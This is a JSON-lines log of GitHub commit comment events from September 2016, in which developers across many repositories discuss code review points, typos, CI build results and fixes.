{"id":"4547683579","type":"CommitCommentEvent","actor":{"login":"SteffySingh"},"repo":{"name":"SteffySingh/Portfolio"},"payload":{"comment":{"id":18980636,"position":1,"line":1,"path":"CNAME","commit_id":"9f03c11aa1bdbb2cad090f9a32cbefd4b096bd0f","created_at":"2016-09-12T07:11:37Z","updated_at":"2016-09-12T07:11:37Z","body":"www.steffysingh.com"}},"created_at":"2016-09-12T07:11:37Z"}
{"id":"4547684580","type":"CommitCommentEvent","actor":{"login":"sonora"},"repo":{"name":"osmandapp/Osmand"},"payload":{"comment":{"id":18980638,"position":null,"line":null,"path":null,"commit_id":"e3ccf71aade0904455178b630325061c85f21e7b","created_at":"2016-09-12T07:11:55Z","updated_at":"2016-09-12T07:11:55Z","body":"@jf-simon  Please note that for keep_and_add_destination_point \"Als Zwischenziel hinzufügen\" is wrong, while \"Als letztes Ziel hinzufügen\" descrbes the action correctly (See #3057)."}},"created_at":"2016-09-12T07:11:55Z"}
{"id":"4547692249","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":18980651,"position":null,"line":null,"path":null,"commit_id":"c66b845f4809125d3e320ce138eed3b1ecb7b39d","created_at":"2016-09-12T07:14:18Z","updated_at":"2016-09-12T07:14:18Z","body":"Thank you, @rob006 \r\n\r\nhttps://github.com/yiisoft/yii2/commit/c25296f2e299e5d4b011f3a29d65ef9ee2dd2ef2"}},"created_at":"2016-09-12T07:14:18Z"}
{"id":"4547693155","type":"CommitCommentEvent","actor":{"login":"b005t3r"},"repo":{"name":"Gamua/Starling-Framework"},"payload":{"comment":{"id":18980657,"position":null,"line":null,"path":null,"commit_id":"7e20a4930db0383ac555b99cdf45c997afb07bdb","created_at":"2016-09-12T07:14:34Z","updated_at":"2016-09-12T07:14:34Z","body":"Consts won't give you any performance gain, as Daniel said, but they can give you a headache when creating a AOT build for iOS. I had problem with local consts (not all of them, however) where the build simply didn't run. I changed most of my local consts to vars and run the build again and it worked :)\r\n\r\nFrom that time I only use static consts, everything else is a var."}},"created_at":"2016-09-12T07:14:34Z"}
{"id":"4547695194","type":"CommitCommentEvent","actor":{"login":"Tom94"},"repo":{"name":"ppy/osu-framework"},"payload":{"comment":{"id":18980667,"position":null,"line":null,"path":null,"commit_id":"7086ec037b0a0c279f5974310faf73751041672c","created_at":"2016-09-12T07:15:13Z","updated_at":"2016-09-12T07:15:13Z","body":"Because I only accidentally made them virtual. Container already re-defines them as virtual, so having the base methods virtual was not necessary."}},"created_at":"2016-09-12T07:15:13Z"}
{"id":"4547702189","type":"CommitCommentEvent","actor":{"login":"MantasVaitkunas"},"repo":{"name":"OXID-eSales/oxideshop_ce"},"payload":{"comment":{"id":18980689,"position":null,"line":null,"path":null,"commit_id":"08bbffecb5b1df20fb29d51acd9dc5336ff33bf7","created_at":"2016-09-12T07:17:19Z","updated_at":"2016-09-12T07:17:19Z","body":"This revert was done because eShop package was generated by Satis. Satis reads .gitignore and removes everything what is added here. This newly generated package can't pass setup.\r\nIn the future we will separate demo data and we will fix this issue, but for now, it must be like this.\r\n\r\nMore info can be found here: https://github.com/OXID-eSales/developer_documentation/issues/1"}},"created_at":"2016-09-12T07:17:19Z"}
{"id":"4547708234","type":"CommitCommentEvent","actor":{"login":"PrimaryFeather"},"repo":{"name":"Gamua/Starling-Framework"},"payload":{"comment":{"id":18980696,"position":null,"line":null,"path":null,"commit_id":"7e20a4930db0383ac555b99cdf45c997afb07bdb","created_at":"2016-09-12T07:19:15Z","updated_at":"2016-09-12T07:19:15Z","body":"Wow, I hadn't run into such an issue before — thanks for the heads-up, Łukasz!\r\nBut yes, I also tend do use `const` mainly for static constants."}},"created_at":"2016-09-12T07:19:15Z"}
{"id":"4547708277","type":"CommitCommentEvent","actor":{"login":"nutdanaipilakom"},"repo":{"name":"ELT581568013/gitlab_group01"},"payload":{"comment":{"id":18980697,"position":null,"line":null,"path":null,"commit_id":"02ddcafbef26d4e7a37992475a8af6b18aea7836","created_at":"2016-09-12T07:19:16Z","updated_at":"2016-09-12T07:19:16Z","body":"vcbb"}},"created_at":"2016-09-12T07:19:16Z"}
{"id":"4547708666","type":"CommitCommentEvent","actor":{"login":"ahmedbera"},"repo":{"name":"arkenthera/Chiika"},"payload":{"comment":{"id":18980698,"position":null,"line":null,"path":null,"commit_id":"71ae51bf994f26c7a73db592292fcf69d42df61a","created_at":"2016-09-12T07:19:25Z","updated_at":"2016-09-12T07:19:25Z","body":"- Fixed list scrollbar covering list cells\r\n- Fixed episodes numbers in library not showing up properly\r\n- Added library item opening animation\r\n- Disabled initial library opening animation (low performance)\r\n- Added card to list-item-expanded"}},"created_at":"2016-09-12T07:19:25Z"}
{"id":"4547710575","type":"CommitCommentEvent","actor":{"login":"dnpetrov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18980704,"position":21,"line":21,"path":"compiler/testData/codegen/box/coroutines/iterateOverArray.kt","commit_id":"e80012cc00f9ac66a390f839a282f90b665a8874","created_at":"2016-09-12T07:20:01Z","updated_at":"2016-09-12T07:20:01Z","body":"s/treatinh/treating"}},"created_at":"2016-09-12T07:20:01Z"}
{"id":"4547729061","type":"CommitCommentEvent","actor":{"login":"andersonfaaria"},"repo":{"name":"otland/forgottenserver"},"payload":{"comment":{"id":18980742,"position":null,"line":null,"path":null,"commit_id":"b7fb97cb1c9d2c92cb28d10ea0cdb0c0943a5fb1","created_at":"2016-09-12T07:25:33Z","updated_at":"2016-09-12T07:25:33Z","body":"@marksamman you can't use manhattan distance since we are allowed to walk diagonally, switch back as it was or change to euclidean distance for a better approach."}},"created_at":"2016-09-12T07:25:33Z"}
{"id":"4547729336","type":"CommitCommentEvent","actor":{"login":"mdoering"},"repo":{"name":"gbif/portal-web"},"payload":{"comment":{"id":18980743,"position":null,"line":null,"path":null,"commit_id":"1d60e291eef58113542f0e3b07e8847118cf3b0d","created_at":"2016-09-12T07:25:38Z","updated_at":"2016-09-12T07:25:38Z","body":"How about using the license macro so its the same as on the dataset page and shows the icon too?\r\nhttps://github.com/gbif/portal-web/blob/master/src/main/webapp/WEB-INF/macros/common.ftl#L272"}},"created_at":"2016-09-12T07:25:38Z"}
{"id":"4547732309","type":"CommitCommentEvent","actor":{"login":"viirre"},"repo":{"name":"adaptivemedia/tech-guidelines"},"payload":{"comment":{"id":18980748,"position":null,"line":null,"path":null,"commit_id":"d779781005a2c2986b256402e144543469e19b8c","created_at":"2016-09-12T07:26:31Z","updated_at":"2016-09-12T07:26:31Z","body":"TODO: teamwork och andra projekttjänster. Harvest m.m"}},"created_at":"2016-09-12T07:26:31Z"}
{"id":"4547733681","type":"CommitCommentEvent","actor":{"login":"mdoering"},"repo":{"name":"gbif/portal-web"},"payload":{"comment":{"id":18980753,"position":null,"line":null,"path":null,"commit_id":"1d60e291eef58113542f0e3b07e8847118cf3b0d","created_at":"2016-09-12T07:26:57Z","updated_at":"2016-09-12T07:26:57Z","body":"Should we really show nothing if the license is UNSUPPORTED? "}},"created_at":"2016-09-12T07:26:57Z"}
{"id":"4547734178","type":"CommitCommentEvent","actor":{"login":"agross"},"repo":{"name":"firehol/netdata"},"payload":{"comment":{"id":18980755,"position":19,"line":28,"path":"conf.d/health_alarm_notify.conf","commit_id":"512266bf55bf13f076a73dba2ace264e9f81163a","created_at":"2016-09-12T07:27:06Z","updated_at":"2016-09-12T07:27:06Z","body":"OK, thanks for the explanation. I think it's better to stay consistent in the comment block: If netdata's included example does not contain a comma the next line should not state that a comma is required. Perhaps: `note: a comma may be used as a separator`?"}},"created_at":"2016-09-12T07:27:06Z"}
{"id":"4547734689","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":18980756,"position":31,"line":28,"path":"wk2/day1/w2d1exer4.js","commit_id":"80da9d5946e1b58ef95942876cfb3303d85991e4","created_at":"2016-09-12T07:27:15Z","updated_at":"2016-09-12T07:27:15Z","body":"It doesn't look like the value of the `carousel` variable is ever a timeout id"}},"created_at":"2016-09-12T07:27:15Z"}
{"id":"4547735792","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":18980758,"position":87,"line":59,"path":"wk2/day1/w2d1exer4.js","commit_id":"80da9d5946e1b58ef95942876cfb3303d85991e4","created_at":"2016-09-12T07:27:34Z","updated_at":"2016-09-12T07:27:34Z","body":"Is this not a timeout we ever want to cancel?"}},"created_at":"2016-09-12T07:27:34Z"}
{"id":"4547740547","type":"CommitCommentEvent","actor":{"login":"timrobertson100"},"repo":{"name":"gbif/portal-web"},"payload":{"comment":{"id":18980766,"position":null,"line":null,"path":null,"commit_id":"1d60e291eef58113542f0e3b07e8847118cf3b0d","created_at":"2016-09-12T07:28:57Z","updated_at":"2016-09-12T07:28:57Z","body":"We'll be deleting unsupported content fairly soon, so should not be a big\nissue - no harm in showing it explicitly though\n\nOn Mon, Sep 12, 2016 at 9:26 AM, Markus Döring <notifications@github.com>\nwrote:\n\n> Should we really show nothing if the license is UNSUPPORTED?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gbif/portal-web/commit/1d60e291eef58113542f0e3b07e8847118cf3b0d#commitcomment-18980753>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAOepV9y2YScB9lEJwiEYv74epHoRwctks5qpP7BgaJpZM4J5E3u>\n> .\n>\n"}},"created_at":"2016-09-12T07:28:57Z"}
{"id":"4547741961","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Feuerman/task11_ToDo_Angular"},"payload":{"comment":{"id":18980768,"position":55,"line":55,"path":"app.js","commit_id":"b6b533d32dea18dd28e3349275f5c11bab3e5bf9","created_at":"2016-09-12T07:29:24Z","updated_at":"2016-09-12T07:29:24Z","body":"`decodeDate` и другие функции, которые используются только в контроллере не нужно класть в scope."}},"created_at":"2016-09-12T07:29:24Z"}
{"id":"4547742753","type":"CommitCommentEvent","actor":{"login":"carschno"},"repo":{"name":"dkpro/dkpro-core"},"payload":{"comment":{"id":18980773,"position":99,"line":187,"path":"dkpro-core-stanfordnlp-gpl/src/main/java/de/tudarmstadt/ukp/dkpro/core/stanfordnlp/StanfordSegmenter.java","commit_id":"5775620b87fdcbc6dfb7bdd646308f09cbc973b0","created_at":"2016-09-12T07:29:37Z","updated_at":"2016-09-12T07:29:37Z","body":"Not sure why `t` was added there as an argument, but it seems like it causes a compile failure; a `createToken()` method with a String arguments does not exist in `SegmenterBase`."}},"created_at":"2016-09-12T07:29:37Z"}
{"id":"4547745155","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18980777,"position":null,"line":null,"path":null,"commit_id":"5937e67982e9cf06fe7e63344aacdec5b58bf708","created_at":"2016-09-12T07:30:20Z","updated_at":"2016-09-12T07:30:20Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 232](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1188&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:25:16"}},"created_at":"2016-09-12T07:30:20Z"}
{"id":"4547745242","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18980779,"position":null,"line":null,"path":null,"commit_id":"f83ad8c2f5a1a12534bcc5da8cbfa1a44dd29a1c","created_at":"2016-09-12T07:30:21Z","updated_at":"2016-09-12T07:30:21Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 233](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1189&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T07:30:21Z"}
{"id":"4547748907","type":"CommitCommentEvent","actor":{"login":"roundrobin99"},"repo":{"name":"hmrc/nisp-frontend"},"payload":{"comment":{"id":18980787,"position":46,"line":187,"path":"test/uk/gov/hmrc/nisp/controllers/NIRecordControllerSpec.scala","commit_id":"8aa94ba4a760a6477eb8e890d2414f67f2dd57b7","created_at":"2016-09-12T07:31:21Z","updated_at":"2016-09-12T07:31:21Z","body":"This test description indicates that it is for date after 2019, but the year provided is 2017. Obviously this tests for dates before 2019, so need to change the text description."}},"created_at":"2016-09-12T07:31:21Z"}
{"id":"4547749905","type":"CommitCommentEvent","actor":{"login":"syzygy1"},"repo":{"name":"syzygy1/Stockfish"},"payload":{"comment":{"id":18980789,"position":null,"line":null,"path":null,"commit_id":"c95b70b855888b9fed745f5d3b657b0b2eb1426b","created_at":"2016-09-12T07:31:39Z","updated_at":"2016-09-12T07:31:39Z","body":"Well, I don't think either of the two equivalent options is easier to understand than the other and I certainly did not pick this one \"just because I know that it is equivalent and do not take in consideration that the most part of us simply will not understand\". Note that I took care to include an explanation in the note. I simply had to pick one and apparently I picked the wrong one (even though people now might think that master is being tested). If the testing guidelines page makes clear which one of the two possibilities to take in this precise situation, then I overlooked it and I apologise for that."}},"created_at":"2016-09-12T07:31:39Z"}
{"id":"4547750007","type":"CommitCommentEvent","actor":{"login":"sofish"},"repo":{"name":"ElemeFE/style-guide"},"payload":{"comment":{"id":18980790,"position":null,"line":null,"path":null,"commit_id":"32e6344de26dd914053858c2be6a62e879ce9ee9","created_at":"2016-09-12T07:31:41Z","updated_at":"2016-09-12T07:31:41Z","body":"是的，修了"}},"created_at":"2016-09-12T07:31:41Z"}
{"id":"4547753727","type":"CommitCommentEvent","actor":{"login":"JustRiedy"},"repo":{"name":"NetDocuments/rd-winrm-plugin"},"payload":{"comment":{"id":18980797,"position":null,"line":null,"path":null,"commit_id":"9f8ec99ea67cf22632587b15c38adf4f9d455ce0","created_at":"2016-09-12T07:32:47Z","updated_at":"2016-09-12T07:32:47Z","body":"Whoops missed that one, good catch!"}},"created_at":"2016-09-12T07:32:47Z"}
{"id":"4547754371","type":"CommitCommentEvent","actor":{"login":"reckart"},"repo":{"name":"dkpro/dkpro-core"},"payload":{"comment":{"id":18980799,"position":99,"line":187,"path":"dkpro-core-stanfordnlp-gpl/src/main/java/de/tudarmstadt/ukp/dkpro/core/stanfordnlp/StanfordSegmenter.java","commit_id":"5775620b87fdcbc6dfb7bdd646308f09cbc973b0","created_at":"2016-09-12T07:32:58Z","updated_at":"2016-09-12T07:32:58Z","body":"I've just committed another set of changes that should address this. I should have paid more attention towards the separation of committed for different issues here."}},"created_at":"2016-09-12T07:32:58Z"}
{"id":"4547756937","type":"CommitCommentEvent","actor":{"login":"lp--"},"repo":{"name":"syzygy1/Stockfish"},"payload":{"comment":{"id":18980812,"position":null,"line":null,"path":null,"commit_id":"4c95edddbf1aaec22c343adaca4796df0137e4c3","created_at":"2016-09-12T07:33:43Z","updated_at":"2016-09-12T07:33:43Z","body":"@syzygy1 But now your move_pick branch is out of date with master. You need to rebase it also"}},"created_at":"2016-09-12T07:33:43Z"}
{"id":"4547760684","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18980824,"position":4,"line":48,"path":"en/source/link_aggregation.rst","commit_id":"ca36a1c6d774805297aa60a82dcfd30166f30687","created_at":"2016-09-12T07:34:50Z","updated_at":"2016-09-12T07:34:50Z","body":"`.. rst-class:: sourcecode`\r\nを削除して影響がでるのはpdf版にて紫色で彩色されるか否かの違いのみで\r\nhtml版と電子書籍版には影響がありませんでした。\r\nまた、私のPC上ではpdf版で左側の枠線が表示されないということはありませんでした。(Adobe Readerのバージョンの差？)\r\n\r\npdfでも読む分には何も問題はありませんが、記載方式が今までと異なってしまうため、\r\n`.. literalinclude::`の前には`.. rst-class:: sourcecode`を付与し、\r\n今までと同じ記述方式となるように修正します。"}},"created_at":"2016-09-12T07:34:50Z"}
{"id":"4547763654","type":"CommitCommentEvent","actor":{"login":"3nids"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18980830,"position":null,"line":null,"path":null,"commit_id":"6b8130d54d17ca9b6e4e047b6f8da15c3d88a8da","created_at":"2016-09-12T07:35:38Z","updated_at":"2016-09-12T07:35:38Z","body":"would it be worth removing all PNGs that are not used in the code?"}},"created_at":"2016-09-12T07:35:38Z"}
{"id":"4547764286","type":"CommitCommentEvent","actor":{"login":"oalexey"},"repo":{"name":"xbadcode/Rubezh"},"payload":{"comment":{"id":18980833,"position":11,"line":53,"path":"Projects/Common/Infrastructure.Client/Images/ImageExtensions.cs","commit_id":"b63ddc35bfbd1bc2f05b000e13c7f45a78d0e6ec","created_at":"2016-09-12T07:35:48Z","updated_at":"2016-09-12T07:35:48Z","body":"Прежняя версия подразумевала получение потока байт с возможной конвертацией в другой формат.\r\nПредложенная реализация не использует конвертацию в другой формат, поэтому присутствие аргумента **ImageFormat format = null** в сигнатуре метода лишено смысла"}},"created_at":"2016-09-12T07:35:48Z"}
{"id":"4547766240","type":"CommitCommentEvent","actor":{"login":"trudisgood"},"repo":{"name":"trudisgood/adblock-dlya-google-chrome"},"payload":{"comment":{"id":18980836,"position":null,"line":null,"path":null,"commit_id":"e639314b4b1a288c787e8f3ef6c932c520985faf","created_at":"2016-09-12T07:36:21Z","updated_at":"2016-09-12T07:36:21Z","body":"back"}},"created_at":"2016-09-12T07:36:21Z"}
{"id":"4547768237","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18980842,"position":null,"line":null,"path":null,"commit_id":"484531676806698c99af518fb0a7504bf3aa144c","created_at":"2016-09-12T07:36:57Z","updated_at":"2016-09-12T07:36:57Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/45/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:182:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:230:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:311:1: C901 'decode' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-12T07:36:57Z"}
{"id":"4547768730","type":"CommitCommentEvent","actor":{"login":"euwbah"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":18980845,"position":null,"line":null,"path":null,"commit_id":"33c929ccde52f3854450e85c628c53e2c5a3f139","created_at":"2016-09-12T07:37:07Z","updated_at":"2016-09-12T07:37:07Z","body":"Hang on... correct me if I'm wrong, but what I've mentioned is already possible with `run_file` right? I'm very curious if run_file would be here to stay haha"}},"created_at":"2016-09-12T07:37:07Z"}
{"id":"4547774490","type":"CommitCommentEvent","actor":{"login":"TheKatarGit"},"repo":{"name":"gofixyourself/University"},"payload":{"comment":{"id":18980853,"position":null,"line":null,"path":null,"commit_id":"a397d4f90b60d2020b0a559fe3ff62c361753aa9","created_at":"2016-09-12T07:38:44Z","updated_at":"2016-09-12T07:38:44Z","body":"Soooo.\r\nStop using git add -a.\r\nAdd txts, binaries and other generated stuff to .gitignore.\r\nCommits should  start with capital and contain some god damn information about what you've done\r\nAND DONT PUSH TO MASTER! Create branches for each lab. Ok?"}},"created_at":"2016-09-12T07:38:44Z"}
{"id":"4547775866","type":"CommitCommentEvent","actor":{"login":"brendonhumphrey"},"repo":{"name":"openzfsonosx/spl"},"payload":{"comment":{"id":18980856,"position":null,"line":null,"path":null,"commit_id":"6c22600ab70187ddf6d070d6bc9fc18084e031c0","created_at":"2016-09-12T07:39:10Z","updated_at":"2016-09-12T07:39:10Z","body":"Will take a look and try it.\n\nHave you tried to reproduce the glitches - I’m certain that they are not unique to me…\n\nB.\n\n> On 12 Sep 2016, at 4:34 AM, rottegift <notifications@github.com> wrote:\n> \n> Current experiment is to create a root below the heap (in your plain vmem_experiments that would be the heap_parent one), and vmem_add(thatvmp, ptr, size) 1 GiB spans to it, then run as a fixed size.\n> \n> It's running. There won't be calls to xnu's freer until spl finishes.\n> \n> The downside is that this really does permanently wire down memory, and without major rewriting, you can only grow by doing vmem_add in future; it's not dynamic in the vmem layer, and you can't shrink below whatever you've vmem_added.\n> \n> On the other hand, if you try something like this and get no glitches (you shouldn't) even during maximal writes, this might be an acceptable trade-off.\n> \n> rottegift@f6395b9 <https://github.com/rottegift/spl/commit/f6395b968c674b0bf93f679dc69deebfeafa76af>\n> rottegift@9315315 <https://github.com/rottegift/spl/commit/93153157523197cb03871df5b593d331342fc892>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub <https://github.com/openzfsonosx/spl/commit/6c22600ab70187ddf6d070d6bc9fc18084e031c0#commitcomment-18977705>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AFWzn7mbPBGHWcWPG1P87JczTdx6lHgYks5qpEnSgaJpZM4J5uzK>.\n> \n\n"}},"created_at":"2016-09-12T07:39:10Z"}
{"id":"4547779228","type":"CommitCommentEvent","actor":{"login":"Gruck"},"repo":{"name":"nical/navco"},"payload":{"comment":{"id":18980861,"position":11,"line":33,"path":"js/client.js","commit_id":"ffc0dc3a9483b89787c0448d3cdcc3a20b2ee966","created_at":"2016-09-12T07:40:07Z","updated_at":"2016-09-12T07:40:07Z","body":"Why would you remove that ? \r\nNow it only works locally, right ?"}},"created_at":"2016-09-12T07:40:07Z"}
{"id":"4547779460","type":"CommitCommentEvent","actor":{"login":"yagebu"},"repo":{"name":"aumayr/fava"},"payload":{"comment":{"id":18980862,"position":32,"line":32,"path":"tests/test_api_filters.py","commit_id":"9b9d71d2810a7424898579f7f80b56f4095f9aa3","created_at":"2016-09-12T07:40:11Z","updated_at":"2016-09-12T07:40:11Z","body":"If you want to test some specific features it's also possible add another beancount file to not interfer with the basic tests."}},"created_at":"2016-09-12T07:40:11Z"}
{"id":"4547781185","type":"CommitCommentEvent","actor":{"login":"JohnnyQQQQ"},"repo":{"name":"DeviantJS/angular2-seed-material2"},"payload":{"comment":{"id":18980867,"position":4,"line":286,"path":"tools/config/seed.config.ts","commit_id":"83d5e8b82d8f8a609769c5c7e1684b55607ac761","created_at":"2016-09-12T07:40:39Z","updated_at":"2016-09-12T07:40:39Z","body":"Take a look here https://github.com/DeviantJS/angular2-seed-material2/blob/master/tools/config/seed.config.ts#L509-L536"}},"created_at":"2016-09-12T07:40:39Z"}
{"id":"4547781454","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18980868,"position":null,"line":null,"path":null,"commit_id":"8d85ce6ac988af8601bac8fe6a56fb75216f279c","created_at":"2016-09-12T07:40:43Z","updated_at":"2016-09-12T07:40:43Z","body":"@snicolet Your're right, I simply have overseen the meaning of lines 88 and 89 in movepick.cpp ;-)"}},"created_at":"2016-09-12T07:40:43Z"}
{"id":"4547781608","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18980869,"position":null,"line":null,"path":null,"commit_id":"ef0d3f05560464cec98e32a22f57be86dcfb856d","created_at":"2016-09-12T07:40:46Z","updated_at":"2016-09-12T07:40:46Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/46/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:182:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:230:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:311:1: C901 'decode' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-12T07:40:46Z"}
{"id":"4547781969","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18980872,"position":null,"line":null,"path":null,"commit_id":"ef0d3f05560464cec98e32a22f57be86dcfb856d","created_at":"2016-09-12T07:40:51Z","updated_at":"2016-09-12T07:40:51Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/47/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:182:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:230:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:311:1: C901 'decode' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-12T07:40:51Z"}
{"id":"4547782870","type":"CommitCommentEvent","actor":{"login":"Gruck"},"repo":{"name":"nical/navco"},"payload":{"comment":{"id":18980876,"position":13,"line":12,"path":"README.md","commit_id":"ffc0dc3a9483b89787c0448d3cdcc3a20b2ee966","created_at":"2016-09-12T07:41:09Z","updated_at":"2016-09-12T07:41:09Z","body":"Client now exposed at http://<serverhost>:3000/index.html"}},"created_at":"2016-09-12T07:41:09Z"}
{"id":"4547783753","type":"CommitCommentEvent","actor":{"login":"Mythos"},"repo":{"name":"pardeike/RimWorld-Achtung-Mod"},"payload":{"comment":{"id":18980878,"position":7,"line":14,"path":"Languages/German/Keyed/Text.xml","commit_id":"7f285844f90ea675bd7fa0d722e0696b2d6bf2e9","created_at":"2016-09-12T07:41:23Z","updated_at":"2016-09-12T07:41:23Z","body":"Typo: kontrolierten -> kontrollierten. :P"}},"created_at":"2016-09-12T07:41:23Z"}
{"id":"4547784821","type":"CommitCommentEvent","actor":{"login":"Mythos"},"repo":{"name":"pardeike/RimWorld-Achtung-Mod"},"payload":{"comment":{"id":18980881,"position":12,"line":17,"path":"Languages/German/Keyed/Text.xml","commit_id":"7f285844f90ea675bd7fa0d722e0696b2d6bf2e9","created_at":"2016-09-12T07:41:41Z","updated_at":"2016-09-12T07:41:41Z","body":"wåhrend -> während"}},"created_at":"2016-09-12T07:41:41Z"}
{"id":"4547784865","type":"CommitCommentEvent","actor":{"login":"JohnnyQQQQ"},"repo":{"name":"DeviantJS/angular2-seed-material2"},"payload":{"comment":{"id":18980882,"position":4,"line":286,"path":"tools/config/seed.config.ts","commit_id":"83d5e8b82d8f8a609769c5c7e1684b55607ac761","created_at":"2016-09-12T07:41:42Z","updated_at":"2016-09-12T07:41:42Z","body":"@amirma Take a look here https://github.com/DeviantJS/angular2-seed-material2/blob/master/tools/config/seed.config.ts#L509-L536"}},"created_at":"2016-09-12T07:41:42Z"}
{"id":"4547785584","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"thiloo/code"},"payload":{"comment":{"id":18980884,"position":76,"line":93,"path":"kitty-carousel/script.js","commit_id":"2e9dd8482d68b855599c7d0bb8a0a4d8356dc8c7","created_at":"2016-09-12T07:41:54Z","updated_at":"2016-09-12T07:41:54Z","body":"I believe this line will cause an error in browsers that do not have a global event object. It is safer to use the event object that is passed to event listeners."}},"created_at":"2016-09-12T07:41:54Z"}
{"id":"4547786427","type":"CommitCommentEvent","actor":{"login":"datakurre"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18980888,"position":null,"line":null,"path":null,"commit_id":"dcd8adbf343727cd5a8c5576962b37709c3ccfb9","created_at":"2016-09-12T07:42:09Z","updated_at":"2016-09-12T07:42:09Z","body":"@hvelarde 1.7.1 is out, but for some reason Travis doesn't trigger build for collective.cover, so I cannot verify that the issue has been fixed."}},"created_at":"2016-09-12T07:42:09Z"}
{"id":"4547787252","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Feuerman/task11_ToDo_Angular"},"payload":{"comment":{"id":18980892,"position":23,"line":23,"path":"index.html","commit_id":"b6b533d32dea18dd28e3349275f5c11bab3e5bf9","created_at":"2016-09-12T07:42:21Z","updated_at":"2016-09-12T07:42:21Z","body":"Если есть возможность, лучше `track by todo.id`"}},"created_at":"2016-09-12T07:42:21Z"}
{"id":"4547791569","type":"CommitCommentEvent","actor":{"login":"invader7"},"repo":{"name":"invader7/jQuery-QueryBuilder"},"payload":{"comment":{"id":18980902,"position":null,"line":null,"path":null,"commit_id":"7970c9a23e5e3ac1a0831f439cdef1f8532dc9ea","created_at":"2016-09-12T07:43:34Z","updated_at":"2016-09-12T07:43:34Z","body":"Hello Damien, thank you very much for your concern and sorry for my late reply.\r\nThanks for adding the Greek translation to project.\r\n\r\nHave a nice day.\r\n\r\nOn 09 Sep 2016, at 22:09, Damien Sorel <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\n\r\nWith no answer from you I added it myself mistic100@78fc4c9<https://github.com/mistic100/jQuery-QueryBuilder/commit/78fc4c93b1bf7b5cfd18a42f8e344f9ddce63d4b>\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/invader7/jQuery-QueryBuilder/commit/7970c9a23e5e3ac1a0831f439cdef1f8532dc9ea#commitcomment-18968013>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ACGRJJX9o31Zi-a8OHjDMnJU1wtxGBSyks5qoa7egaJpZM4JgS0a>.\r\n\r\n"}},"created_at":"2016-09-12T07:43:34Z"}
